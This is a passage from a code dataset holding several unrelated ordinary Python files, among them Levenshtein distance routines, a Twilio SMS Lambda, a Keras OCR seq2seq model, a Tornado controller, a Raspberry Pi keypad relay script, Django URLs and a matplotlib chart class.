time_start)/1000))\n #---------------------------\n time_start = time.process_time()\n\n for i in range(1000):\n d_lev_mat(str1, str2)\n\n time_end = time.process_time()\n print('{:.7f}'.format((time_end - time_start)/1000))\n # ---------------------------\n time_start = time.process_time()\n\n for i in range(1000):\n d_lev_rec(str1, str2)\n\n time_end = time.process_time()\n print('{:.7f}'.format((time_end - time_start)/1000))\n\ndef lev_mat(str1, str2, output = False):\n if len(str1) and len(str2):\n matrix = create_matrix(str1, str2)\n\n for i in range (1, len(matrix)):\n matrix[i][0] = matrix[i-1][0] + 1\n\n for i in range (1, len(matrix[0])):\n matrix[0][i] = matrix[0][i-1] + 1\n\n for i in range (1, len(str2) + 1):\n for j in range (1, len(str1) + 1):\n penalty = matrix[i-1][j-1]\n if str1[j-1] != str2[i-1]:\n penalty += 1\n penalty = min(penalty, matrix[i][j-1] + 1, matrix[i-1][j] + 1)\n\n matrix[i][j] = penalty\n\n d = matrix[len(matrix) - 1][len(matrix[0]) - 1]\n if output:\n print_matrix(matrix)\n elif not len(str1) and not len(str2):\n d = 0\n else:\n if len(str1):\n d = len(str1)\n else:\n d = len(str2)\n\n return d\n\ndef d_lev_rec(str1, str2):\n # global mem_rec\n # global count\n #\n # count +=1\n\n if not (len(str1) or len(str2)):\n return 0\n elif not (len(str1) and len(str2)):\n if len(str1):\n return len(str1)\n else:\n return len(str2)\n\n # mem_rec += 2*sys.getsizeof(str1[:-1])\n # mem_rec += 2*sys.getsizeof(str2[:-1])\n d1 = d_lev_rec(str1, str2[:-1]) + 1\n d2 = d_lev_rec(str1[:-1], str2) + 1\n d3 = d_lev_rec(str1[:-1], str2[:-1])\n if str1[-1] != str2[-1]:\n d3 += 1\n\n d4 = 0\n if len(str1) > 1 and len(str2) > 1:\n if str1[-1] == str2[-2] and str1[-2] == str2[-1]:\n # mem_rec += sys.getsizeof(str1[:-2])\n # mem_rec += sys.getsizeof(str2[:-2])\n d4 = d_lev_rec(str1[:-2], str2[:-2]) + 1\n\n if not d4:\n res = min(d1, d2, d3)\n else:\n res = min(d1, d2, d3, d4)\n\n return res\n\ndef d_lev_mat(str1, str2, output = False):\n # global mem_mat\n\n if len(str1) and len(str2):\n matrix = create_matrix(str1, str2)\n\n for i in range (1, len(matrix)):\n matrix[i][0] = matrix[i-1][0] + 1\n\n for i in range (1, len(matrix[0])):\n matrix[0][i] = matrix[0][i-1] + 1\n\n for i in range (1, len(str2) + 1):\n for j in range (1, len(str1) + 1):\n penalty = matrix[i-1][j-1]\n if str1[j-1] != str2[i-1]:\n penalty += 1\n penalty = min(penalty, matrix[i][j-1] + 1, matrix[i-1][j] + 1)\n if i > 1 and j > 1:\n if str1[j-1] == str2[i-2] and str2[i-1] == str1[j-2]:\n penalty = min(penalty, matrix[i-2][j-2] + 1)\n\n matrix[i][j] = penalty\n\n d = matrix[len(matrix) - 1][len(matrix[0]) - 1]\n # mem_mat += len(matrix)*len(matrix[0])*sys.getsizeof(matrix[0][0])\n # mem_mat += 2*sys.getsizeof(d)\n if output:\n print_matrix(matrix)\n elif not len(str1) and not len(str2):\n d = 0\n else:\n if len(str1):\n d = len(str1)\n else:\n d = len(str2)\n\n return d\n\nstring1 = input(\"first string to compare: \")\nstring2 = input(\"second string to compare: \")\n\nprint(\"string1: (\", string1, \") \", len(string1))\nprint(\"string2: (\", string2, \") \", len(string2))\n\nmem_rec = 0\nmem_mat = 0\ncount = 0\n\nd_mat = lev_mat(string1, string2, True)\nprint(\"levenstein matrix \", d_mat)\n\nd_d_l_mat = d_lev_mat(string1, string2, True)\nprint(\"damerau-levenstein matrix \", d_d_l_mat)\n\nd_d_l_rec = d_lev_rec(string1, string2)\nprint(\"damerau-levenstein recurent \", d_d_l_rec)\n\n# print(\"\\nMemory recurse: {0} + (memory in stack for 1 call)*{1}\".format(mem_rec, count))\n# print(\"Memory not recurse: {0} + (memory in stack for 1 call)*1\".format(mem_mat + sys.getsizeof(string1) + sys.getsizeof(string2)))\n\n# compare()\n\n","sub_path":"anal/levenshtein.py","file_name":"levenshtein.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"405230997","text":"import base64\nimport json\nimport os\nimport urllib\nfrom urllib import request, parse\n\nTWILIO_SMS_URL = \"https://api.twilio.com/2010-04-01/Accounts/{}/Messages.json\"\nTWILIO_ACCOUNT_SID = os.environ.get(\"TWILIO_ACCOUNT_SID\")\nTWILIO_AUTH_TOKEN = os.environ.get(\"TWILIO_AUTH_TOKEN\")\n\ndef lambda_handler(event, context):\n try:\n queryPhone = event['queryStringParameters']['phone']\n lat = event['queryStringParameters']['lat']\n long = event['queryStringParameters']['long']\n except:\n responseErr = {}\n responseErr[\"statusCode\"] = 400\n return responseErr\n to_number = '+1' + queryPhone\n from_number = \"+18573228013\"\n locals_list = ''\n # insert Twilio Account SID into the REST API URL\n req = request.Request(\"https://po4sn5eftg.execute-api.us-east-2.amazonaws.com/nearby?longitude=%s&latitude=%s\" % (str(long), str(lat)))\n try:\n # perform HTTP POST request\n with request.urlopen(req) as f:\n locals_list = str(f.read().decode('utf-8'))\n except Exception as e:\n # something went wrong!\n return e\n locals_list = json.loads(locals_list)\n text_message = \"Nearby Landmarks:\\n\" \n found = False\n for element in locals_list[\"landmarks\"]:\n if int(element[\"rating\"]) >= 4.0:\n text_message += element[\"name\"] + \" (%s) - %.1f/5.0\\n\" % (element[\"types\"][0].replace(\"_\", \" \"), element[\"rating\"])\n found = True\n break\n if found == False:\n return \"No Nearby Landmarks\"\n body = text_message\n if not TWILIO_ACCOUNT_SID:\n return \"Unable to access Twilio Account SID.\"\n elif not TWILIO_AUTH_TOKEN:\n return \"Unable to access Twilio Auth Token.\"\n elif not to_number:\n return \"The function needs a 'To' number in the format +12023351493\"\n elif not from_number:\n return \"The function needs a 'From' number in the format +19732644156\"\n elif not body:\n return \"The function needs a 'Body' message to send.\"\n # insert Twilio Account SID into the REST API URL\n populated_url = TWILIO_SMS_URL.format(TWILIO_ACCOUNT_SID)\n post_params = {\"To\": to_number, \"From\": from_number, \"Body\": body}\n # encode the parameters for Python's urllib\n data = parse.urlencode(post_params).encode()\n req = request.Request(populated_url)\n # add authentication header to request based on Account SID + Auth Token\n authentication = \"{}:{}\".format(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)\n base64string = base64.b64encode(authentication.encode('utf-8'))\n req.add_header(\"Authorization\", \"Basic %s\" % base64string.decode('ascii'))\n try:\n # perform HTTP POST request\n with request.urlopen(req, data) as f:\n print(\"Twilio returned {}\".format(str(f.read().decode('utf-8'))))\n except Exception as e:\n # something went wrong!\n return e\n return \"SMS sent successfully!\"\n","sub_path":"backend/lambda/sendsms.py","file_name":"sendsms.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"293284680","text":"from tensorflow.python.keras.layers import Bidirectional,Input, GRU, Dense, Concatenate, TimeDistributed\nfrom tensorflow.python.keras.models import Model\nfrom tensorflow.python.keras.optimizers import Adam\nimport tensorflow as tf\nfrom layers.conv import Conv\nfrom layers.attention import AttentionLayer\nimport logging\nfrom utils.logger import _p\nlogger = logging.getLogger(\"Model\")\n\n\n# y_pred is [batch,seq,charset_size]\n# 这个函数的细节,测试了一下,参考:test/test_accuracy.py\n# 不过这个是对一个batch的,对于validate中的多个batches,是否还会在多个batches上平均,\n# 这个细节就不太了解了....?\n# 2020.3.19,y_pred第一维度是batch,:https://stackoverflow.com/questions/46663013/what-is-y-true-and-y-pred-when-creating-a-custom-metric-in-keras\ndef words_accuracy(y_true, y_pred):\n # logger.debug(\"DEBUG@@@,看看y_pred的shape:%r\",K.int_shape(y_pred))\n # 调试结果是======>(None, None, 3864)\n # 第一个维度是batch,第三个维度是词表长度,那第二个维度呢?\n #\n # y_pred = _p(y_pred,\"DEBUG@@@,运行态的时候的words_accuracy的入参y_pred的shape\")\n # 运行态的时候的words_accuracy的入参y_pred的shape[2 29 3864]\n # 所以y_pred[batch,seq_len,vocabulary_size]\n # 经调试,没问题\n\n max_idx_p = tf.argmax(y_pred, axis=2)\n max_idx_l = tf.argmax(y_true, axis=2)\n max_idx_p = _p(max_idx_p,\"@@@,预测值\")\n max_idx_l = _p(max_idx_l, \"@@@,标签值\")\n correct_pred = tf.equal(max_idx_p, max_idx_l)\n correct_pred = _p(correct_pred, \"@@@,words_accuracy(字对字)\")\n _result = tf.map_fn(fn=lambda e: tf.reduce_all(e), elems=correct_pred, dtype=tf.bool)\n _result = _p(_result, \"@@@,words_accuracy(词对词)\")\n result = tf.reduce_mean(tf.cast(_result, tf.float32))\n result = _p(result, \"@@@,words_accuracy正确率\")\n return result\n\n\ndef train_model(conf,args):\n\n conv,input_image = Conv().build()\n\n encoder_bi_gru = Bidirectional(GRU(conf.GRU_HIDDEN_SIZE,\n return_sequences=True,\n return_state=True,\n name='encoder_gru'),\n name='bidirectional_encoder')\n\n # TODO:想不通如何实现2个bi-GRU堆叠,作罢,先继续,未来再回过头来考虑\n # encoder_bi_gru2 = Bidirectional(GRU(conf.GRU_HIDDEN_SIZE,\n # return_sequences=True,\n # return_state=True,\n # name='encoder_gru'),\n # input_shape=( int(conf.INPUT_IMAGE_WIDTH/4) ,512),\n # name='bidirectional_encoder')\n\n encoder_out, encoder_fwd_state, encoder_back_state = encoder_bi_gru(conv)\n encoder_fwd_state = _p(encoder_fwd_state, \"编码器输出Fwd状态%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n encoder_back_state = _p(encoder_back_state, \"编码器输出Back状态%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n\n decoder_inputs = Input(shape=(None,conf.CHARSET_SIZE), name='decoder_inputs')\n decoder_gru = GRU(units=conf.GRU_HIDDEN_SIZE*2, return_sequences=True, return_state=True, name='decoder_gru')\n decoder_initial_status = Concatenate(axis=-1)([encoder_fwd_state, encoder_back_state])\n decoder_out, decoder_state = decoder_gru(decoder_inputs,initial_state=decoder_initial_status)\n\n attn_layer = AttentionLayer(name='attention_layer')\n logger.debug(\"模型Attention调用的张量[encoder_out, decoder_out]:%r,%r\",encoder_out, decoder_out)\n attn_out, attn_states = attn_layer([encoder_out, decoder_out]) # c_outputs, e_outputs\n\n decoder_concat_input = Concatenate(axis=-1, name='concat_layer')([decoder_out, attn_out])\n dense = Dense(conf.CHARSET_SIZE, activation='softmax', name='softmax_layer')\n dense_time = TimeDistributed(dense, name='time_distributed_layer')\n\n # decoder_concat_input = _p(decoder_concat_input, \"编码器输出所有的状态s%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n decoder_prob = dense_time(decoder_concat_input)\n\n train_model = Model(inputs=[input_image, decoder_inputs], outputs=decoder_prob)\n opt = Adam(lr=args.learning_rate)\n\n # categorical_crossentropy主要是对多分类的一个损失,但是seq2seq不仅仅是一个结果,而是seq_length个多分类问题,是否还可以用categorical_crossentropy?\n # 这个疑惑在这个例子中看到答案:https://keras.io/examples/lstm_seq2seq/\n # 我猜,keras的代码中应该是做了判断,如果是多个categorical_crossentropy,应该会K.reduce_mean()一下吧。。。\n train_model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=[words_accuracy])\n\n train_model.summary()\n\n return train_model\n\ndef infer_model(model,conf):\n # 编码器\n encoder_inputs = model.input[0] # encoder input\n bidirectional_encoder = model.get_layer(\"bidirectional_encoder\")\n encoder_outputs, state_f_enc, state_b_enc = bidirectional_encoder.output\n encoder_state = Concatenate(axis=-1, name='encoder_state')([state_f_enc, state_b_enc])\n encoder_model = Model(encoder_inputs, [encoder_outputs,encoder_state])\n\n # 解码器\n decoder_inputs = model.input[1] # decoder input\n decoder_init_state = Input(shape=(2*conf.GRU_HIDDEN_SIZE,), name='initial_status')\n encoder_states = Input(shape=(conf.FEATURE_MAP_WIDTH,conf.GRU_HIDDEN_SIZE*2,), name='encoder_states')\n\n decoder_gru = model.get_layer(\"decoder_gru\")\n decoder_outputs, decoder_state = decoder_gru(decoder_inputs, initial_state=decoder_init_state)\n\n attention_layer = model.get_layer(\"attention_layer\")\n attention_outputs,attention_prob = attention_layer([encoder_states,decoder_outputs])\n\n concat_outputs = Concatenate(axis=-1, name='concat_layer')([decoder_outputs, attention_outputs])\n\n decoder_dense = model.get_layer(\"time_distributed_layer\")\n decoder_outputs = decoder_dense(concat_outputs)\n\n decoder_model = Model(\n [decoder_inputs,encoder_states,decoder_init_state],\n [decoder_outputs,attention_prob,decoder_state])\n return encoder_model,decoder_model","sub_path":"layers/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"12372886","text":"\"\"\"The Tinman Controller class, uses clihelper for most of the main\nfunctionality with regard to configuration, logging and daemoniaztion. Spawns a\ntornado.HTTPServer and Application per port using multiprocessing.\n\n\"\"\"\nimport clihelper\nimport logging\nimport multiprocessing\nimport os\nimport signal\nimport sys\nimport time\nfrom tornado import version as tornado_version\n\n\n# Tinman Imports\nfrom tinman import __desc__\nfrom tinman import __version__\nfrom tinman import config\nfrom tinman import process\n\n# Additional required configuration keys\nREQUIRED_CONFIG_KEYS = [config.HTTP_SERVER, config.ROUTES]\nMAX_SHUTDOWN_WAIT = 2\nSHUTDOWN_SLEEP_INTERVAL = 0.25\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Controller(clihelper.Controller):\n \"\"\"Main application controller class. Responsible for spawning all of the\n HTTPServer / Applications.\n\n \"\"\"\n def __init__(self, options, arguments):\n \"\"\"Create a new instance of the Controller class\n\n :param optparse.Values options: CLI Options\n :param list arguments: Additional CLI arguments\n\n \"\"\"\n super(Controller, self).__init__(options, arguments)\n self.children = list()\n self.manager = multiprocessing.Manager()\n self.manager.child_stats = list()\n self.manager.config = self.config\n self.manager.debug = self._debug\n self.manager.options = options\n\n @property\n def config_base_path(self):\n return self.application_config.get(config.PATHS,\n dict()).get(config.BASE)\n\n def create_process(self, port):\n \"\"\"Create an Application and HTTPServer for the given port.\n\n :param int port: The port to listen on\n :rtype: multiprocessing.Process\n\n \"\"\"\n LOGGER.info('Creating HTTPServer and Application on port %i', port)\n return process.Process(name=\"ServerProcess.%i\" % port,\n kwargs={'manager': self.manager,\n 'port': port})\n\n @property\n def http_server_config(self):\n \"\"\"Return the HTTPServer configuration\n\n :rtype: dict\n\n \"\"\"\n return self._config[config.HTTP_SERVER]\n\n def insert_base_path(self):\n \"\"\"Inserts a base path into the sys.path list if one is specified in\n the configuration.\n\n \"\"\"\n if hasattr(self._options, 'path') and self._options.path:\n self.set_base_path(self._options.path)\n if self.config_base_path:\n LOGGER.debug('Appending %s to the sys.path list',\n self.config_base_path)\n self.insert_path(self.config_base_path)\n\n def insert_path(self, path):\n \"\"\"Insert a path into the Python system paths.\n\n \"\"\"\n sys.path.insert(0, path)\n\n @property\n def living_children(self):\n return [child for child in self.children if child.is_alive()]\n\n def set_base_path(self, value):\n \"\"\"Munge in the base path into the configuration values\n\n :param str value: The path value\n\n \"\"\"\n if config.PATHS not in self._config[config.APPLICATION]:\n self._config[config.APPLICATION][config.PATHS] = dict()\n self._config[config.APPLICATION][config.PATHS][config.BASE] = value\n\n def reload_configuration(self):\n \"\"\"Reload the configuration via clihelper.Controller and then notify\n children up the update\n\n \"\"\"\n super(Controller, self).reload_configuration()\n for child in self.living_children:\n if child.pid != os.getpid():\n os.kill(child.pid, signal.SIGHUP)\n\n def setup(self):\n \"\"\"Additional setup steps.\"\"\"\n LOGGER.info('Tinman v%s starting up with Tornado v%s',\n __version__, tornado_version)\n self.insert_base_path()\n self.start_children()\n\n def start_children(self):\n \"\"\"Start the child processes\"\"\"\n for port in self.http_server_config['ports']:\n child = self.create_process(port)\n child.start()\n self.children.append(child)\n\n def stop(self):\n \"\"\"Called when the application is shutting down, notify the child\n processes and loop until they are shutdown.\n\n \"\"\"\n self.set_state(self.STATE_STOPPING)\n\n # Signal Children to Stop\n LOGGER.info('Stopping child processes')\n for child in self.living_children:\n child.terminate()\n\n # Loop while children are alive\n LOGGER.info('Waiting for all child processes to die')\n start_time = time.time()\n while self.living_children:\n time.sleep(SHUTDOWN_SLEEP_INTERVAL)\n if time.time() - start_time >= MAX_SHUTDOWN_WAIT:\n LOGGER.info('All children did not stop in time')\n break\n\n if self.living_children:\n LOGGER.info('Killing child processes')\n for child in self.living_children:\n if child.pid != os.getpid():\n os.kill(child.pid, signal.SIGKILL)\n\n # Note that the shutdown process is complete\n self._stopped()\n\n\ndef add_required_config_keys():\n \"\"\"Add each of the items in the _REQUIRED_CONFIG_KEYS to the\n clihelper._CONFIG_KEYS for validation of the configuration file. If one of\n the items is not present in the config file, an exception will be thrown\n and the application will be shutdown.\n\n \"\"\"\n [clihelper.add_config_key(key) for key in REQUIRED_CONFIG_KEYS]\n\n\ndef setup_options(parser):\n \"\"\"Called by the clihelper._cli_options method if passed to the\n Controller.run method.\n\n \"\"\"\n parser.add_option(\"-n\", \"--newrelic\",\n action=\"store\",\n dest=\"newrelic\",\n default=None,\n help=\"Path to newrelic.ini to enable NewRelic \"\n \"instrumentation\")\n parser.add_option(\"-p\", \"--path\",\n action=\"store\",\n dest=\"path\",\n default=None,\n help=\"Path to prepend to the Python system path\")\n\n\ndef main():\n \"\"\"Invoked by the script installed by setuptools.\"\"\"\n clihelper.setup('tinman', __desc__, __version__)\n add_required_config_keys()\n clihelper.run(Controller, setup_options)\n","sub_path":"tinman/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"498708775","text":"import urllib.request as ur\nimport xml.etree.ElementTree as ET\nimport re\n\nserviceurl = 'http://python-data.dr-chuck.net/comments_229357.xml'\nprint (serviceurl)\nurlopen = ur.urlopen(serviceurl)\ndata = urlopen.read()\ntree = ET.fromstring(data)\ncounts = tree.findall('.//count')\n#print (counts.text)\nprint('total counts: ', len(counts))\n#counts = [int (i) for i in counts]\n#counts = sum(counts)\ntotalvalues = []\nfor i in counts:\n values = i.text\n totalvalues.append(values)\n#print (totalvalues)\ntotalvalues = [int(x) for x in totalvalues]\ntotalvalues = sum(totalvalues)\nprint(totalvalues)\n\n\n\n\n\n\n\n \n \n\n","sub_path":"xml_assignment.py","file_name":"xml_assignment.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"524248013","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis Python script activate_relay_via_pin_code.py implements a relay activation mechanism\nonly after successful authentication via PIN code that inserted with the key pad.\n\nMIT License\n\nRaspberry Pi - Access via Smart Card TS-CNS\n\nCopyright (c) 2020 Antonio Musarra's Blog - https://www.dontesta.it\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in the\nSoftware without restriction, including without limitation the rights to use,\ncopy, modify, merge, publish, distribute, sublicense, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n__author__ = \"Antonio Musarra\"\n__copyright__ = \"Copyright 2020 Antonio Musarra's Blog\"\n__credits__ = [\"Antonio Musarra\"]\n__version__ = \"1.0.0\"\n__license__ = \"MIT\"\n__maintainer__ = \"Antonio Musarra\"\n__email__ = \"antonio.musarra@gmail.com\"\n__status__ = \"Development\"\n\nfrom pad4pi import rpi_gpio\nfrom modules.PCF8574 import PCF8574_GPIO\nfrom modules.Adafruit_LCD1602 import Adafruit_CharLCD\n\nimport RPi.GPIO as GPIO\nimport time\nimport sys\n\n# Check I2C address via command i2cdetect -y 1\nPCF8574_address = 0x27 # I2C address of the PCF8574 chip.\nPCF8574A_address = 0x3F # I2C address of the PCF8574A chip.\n\n# Create PCF8574 GPIO adapter.\ntry:\n mcp = PCF8574_GPIO(PCF8574_address)\nexcept:\n try:\n mcp = PCF8574_GPIO(PCF8574A_address)\n except:\n print('I2C Address Error !')\n exit(1)\n\n# Create LCD, passing in MCP GPIO adapter.\nlcd = Adafruit_CharLCD(pin_rs=0, pin_e=2, pins_db=[4, 5, 6, 7], GPIO=mcp)\n\nKEYPAD = [\n [1, 2, 3, \"A\"],\n [4, 5, 6, \"B\"],\n [7, 8, 9, \"C\"],\n [\"*\", 0, \"#\", \"D\"]\n]\n\nROW_PINS = [18, 12, 20, 21] # BCM numbering\nCOL_PINS = [10, 22, 27, 17] # BCM numbering\n\n# Dictionary of relationship between relay identification and BCM pin\ndict_relay_bcm = {\n 1: 23,\n 2: 24,\n 3: 25,\n 4: 16\n}\n\nentered_pin = \"\"\nentered_pin_is_ok = False\ncorrect_pin = \"1234\"\n\n\n# Activate the relay\ndef activate_relay(relay_id):\n if 1 <= relay_id <= 4:\n lcd.clear()\n lcd.message(\"Activate Relay \" + str(relay_id) + \"\\n\")\n lcd.message(\"Press C to exit\")\n\n GPIO.output(dict_relay_bcm[relay_id], GPIO.LOW)\n\n print(f\"Activate Relay {str(relay_id)}\")\n\n\n# Check entered PIN code\ndef check_pin(key):\n global entered_pin, correct_pin\n\n if len(entered_pin) == len(correct_pin) or key == \"#\":\n if entered_pin == correct_pin:\n correct_pin_entered()\n else:\n incorrect_pin_entered()\n\n\n# CleanUp the resources\ndef cleanup():\n global keypad\n\n lcd.clear()\n lcd.message(\"Goodbye...\\n\")\n lcd.backlight = False\n keypad.cleanup()\n\n\n# Display info on corrected PIN code and exit\ndef correct_pin_entered():\n global entered_pin_is_ok\n\n entered_pin_is_ok = True\n\n lcd.clear()\n lcd.message(\"Access granted\\n\")\n lcd.message(\"Accepted PIN\\n\")\n\n print(\"PIN accepted. Access granted.\")\n\n select_relay_to_activate()\n\n\n# Construct the entered PIN code\ndef digit_entered(key):\n global entered_pin, correct_pin, entered_pin_is_ok\n\n if entered_pin_is_ok:\n activate_relay(key)\n else:\n entered_pin += str(key)\n print(entered_pin)\n\n lcd.clear()\n lcd.message(\"PIN: \" + entered_pin + \"\\n\")\n lcd.message(\"# to confirm\")\n\n check_pin(key)\n\n\n# Display info on in-corrected PIN code and exit\ndef incorrect_pin_entered():\n lcd.clear()\n lcd.message(\"Access denied\\n\")\n lcd.message(\"Incorrect PIN\\n\")\n\n print(\"Incorrect PIN. Access denied.\")\n\n time.sleep(5)\n cleanup()\n sys.exit()\n\n\n# Initialize the I2C LCD 1602 Display\ndef initialize_lcd():\n mcp.output(3, 1) # turn on LCD backlight\n lcd.begin(16, 2) # set number of LCD lines and columns\n\n lcd.message(\"Enter your PIN\\n\")\n lcd.message(\"Press * to clear\")\n\n\n# Initialize the GPIO for the relay module\ndef initialize_relay():\n for relay_id, bcm_value in dict_relay_bcm.items():\n GPIO.setup(bcm_value, GPIO.OUT, initial=GPIO.HIGH)\n\n\n# Manage no PIN code key\ndef non_digit_entered(key):\n global entered_pin\n\n if key == \"C\":\n cleanup()\n sys.exit()\n\n if not entered_pin_is_ok and key == \"*\" and len(entered_pin) > 0:\n entered_pin = entered_pin[:-1]\n\n lcd.clear()\n lcd.message(\"PIN: \" + entered_pin + \"\\n\")\n lcd.message(\"# to confirm\")\n\n print(entered_pin)\n\n if not entered_pin_is_ok and key == \"#\" and len(entered_pin) > 0:\n check_pin(key)\n\n\n# Display selected relay to activate\ndef select_relay_to_activate():\n lcd.clear()\n lcd.message(\"Digit Relay Id\\n\")\n lcd.message(\"to activate\")\n\n print(\"Which relay do you want activate/deactivate (1,2,3,4)?\")\n\n\n# Press handler key\ndef key_pressed(key):\n try:\n int_key = int(key)\n if 0 <= int_key <= 9:\n digit_entered(key)\n except ValueError:\n non_digit_entered(key)\n\n\n\ntry:\n factory = rpi_gpio.KeypadFactory()\n keypad = factory.create_keypad(keypad=KEYPAD, row_pins=ROW_PINS, col_pins=COL_PINS)\n\n keypad.registerKeyPressHandler(key_pressed)\n\n initialize_lcd()\n initialize_relay()\n\n print(\"Enter your PIN:\")\n print(\"Press * to clear previous digit.\")\n print(\"Press # to confirm.\")\n print(\"Press C to exit.\")\n\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n print(\"Goodbye\")\nfinally:\n cleanup()\n","sub_path":"activate_relay_via_pin_code.py","file_name":"activate_relay_via_pin_code.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"88289858","text":"from django.urls import path\nfrom .views import (\n UserListAPIView,\n UserDetailListAPIView,\n UserEditListAPIView,\n UserDeleteListAPIView,\n BookCreateListAPIView,\n BookListAPIView,\n CategoryCreateAPIView,\n CategoryListAPIView,\n BookDeleteAPIView,\n BookEditAPIView,\n BookDetailAPIView,\n CategoryDetailAPIView,\n CategoryDeleteAPIView,\n CategoryEditAPIView,\n)\n\nurlpatterns = [\n path('users/', UserListAPIView.as_view(), name='all users'),\n path('users/<int:pk>/', UserDetailListAPIView.as_view(), name='user detail'),\n path('users/<int:pk>/edit/', UserEditListAPIView.as_view(), name='user edit'),\n path('users/<int:pk>/delete/', UserDeleteListAPIView.as_view(), name='delete user'),\n path('book/create/', BookCreateListAPIView.as_view(), name='book create'),\n path('books/', BookListAPIView.as_view(), name='all books'),\n path('category/create/', CategoryCreateAPIView.as_view(), name='create category'),\n path('categories/', CategoryListAPIView.as_view(), name='all categories'),\n path('category<int:pk>/edit/', CategoryEditAPIView.as_view(), name='edit category'),\n path('category<int:pk>/', CategoryDetailAPIView.as_view(), name='detail of category'),\n path('category<int:pk>/delete/', CategoryDeleteAPIView.as_view(), name='delete category'),\n path('book/<int:pk>/edit', BookEditAPIView.as_view(), name='edit book'),\n path('book/<int:pk>/detail/', BookDetailAPIView.as_view(), name='detail book'),\n path('book/<int:pk>/delete/', BookDeleteAPIView.as_view(), name='delete book'),\n\n\n]\n\n","sub_path":"adminuser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"73899763","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Copyright 2018 Gabriele Iannetti <g.iannetti@gsi.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n\n\nimport pandas as pd\n\nimport matplotlib\n# Force matplotlib to not use any X window backend.\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom chart.base_chart import BaseChart\n\n\nclass TrendChart(BaseChart):\n\n def __init__(self, title, dataset, file_path, x_label, y_label):\n\n if type(dataset) != pd.DataFrame:\n raise RuntimeError('As dataset a Pandas Data Frame is required!')\n\n if not len(dataset):\n raise RuntimeError('Retrieved an empty Pandas Data Frame!')\n\n super(TrendChart, self).__init__(title, dataset, file_path, x_label, y_label)\n\n self.start_date = self.dataset.index.min().strftime('%Y-%m-%d')\n self.end_date = self.dataset.index.max().strftime('%Y-%m-%d')\n\n # No bright colors.\n self.color_name = 'Dark2'\n\n def _add_sorted_legend(self, df_tail):\n \"\"\"\n Adds a sorted legend to the figure sorted by the last values retrieved\n from the given Pandas Data Frame last values.\n :param df_tail: Tail from Pandas Data Frame.\n \"\"\"\n\n df_tail_labels = df_tail.columns.values\n df_tail_values = df_tail.values.tolist()[0]\n df_pairs = zip(df_tail_labels, df_tail_values)\n\n import operator\n sorted_df_pairs = \\\n sorted(df_pairs, key=operator.itemgetter(1), reverse=True)\n\n sorted_labels = [ item[0] for item in sorted_df_pairs ]\n\n ax_handles, ax_labels = self._ax.get_legend_handles_labels()\n\n ax_pairs = list(zip(ax_handles, ax_labels))\n ax_pairs.sort(key=lambda ax_pairs: sorted_labels.index(ax_pairs[1]))\n\n handles, labels = zip(*ax_pairs)\n\n self._figure.legend(handles=handles, labels=labels, title=\"Groups\",\n fontsize='small', loc='upper left', handlelength=5)\n\n def _draw(self):\n\n line_style_def = ['-', '--', '-.', ':']\n len_lsd = len(line_style_def)\n line_styles = list()\n\n for i in range(len(self.dataset.keys())):\n line_styles.append(line_style_def[i % len_lsd])\n\n self._ax.yaxis.set_major_locator(plt.MaxNLocator(12))\n\n color_map = \\\n BaseChart._create_colors(self.color_name, len(self.dataset.keys()))\n\n self.dataset.plot(ax=self._ax, legend=False, style=line_styles, color=color_map, grid=True)\n\n sub_title = \"Date from %s to %s\" % (self.start_date, self.end_date)\n\n self._ax.set_title(sub_title, fontsize=12)\n\n 